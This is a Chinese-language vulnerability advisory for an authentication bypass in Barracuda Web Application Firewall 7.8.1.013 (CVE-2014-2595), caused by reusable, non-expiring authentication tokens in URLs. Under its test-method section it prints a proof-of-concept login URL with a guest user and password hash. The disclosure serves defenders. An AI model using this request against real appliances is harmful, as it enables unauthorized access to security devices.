发布日期：2014-08-04
更新日期：2014-08-05

受影响系统：

Barracuda Networks Web Application Firewall

描述：

---

BUGTRAQ  ID: 69028
CVE(CAN) ID: CVE-2014-2595

Barracuda Web Application Firewall是Web应用程序和Web站点的完整安全解决方案。

Barracuda Web Application Firewall 7.8.1.013在实现上存在身份验证绕过漏洞，攻击者可以重复使用一个链接，该链接的查询字符串包含不过期的身份验证令牌，从而绕过身份验证机制，获取设备的访问权。

<*来源：Nick Hayes
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/cgi-mod/index.cgi?auth_type=Local&amp;amp;et=99999999996locale=en_US&amp;amp;password=5a2fd48b65c5d80881eeb0f738bcc6dc&amp;amp;primary_tab=SECURITY%20POLICIES&amp;amp;secondary_tab=request_limits&amp;amp;user=guest

建议：

---

厂商补丁：

Barracuda Networks
------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.barracudanetworks.com/ns/products/spam_overview.php

浏览次数：2201
严重程度：0（网友投票）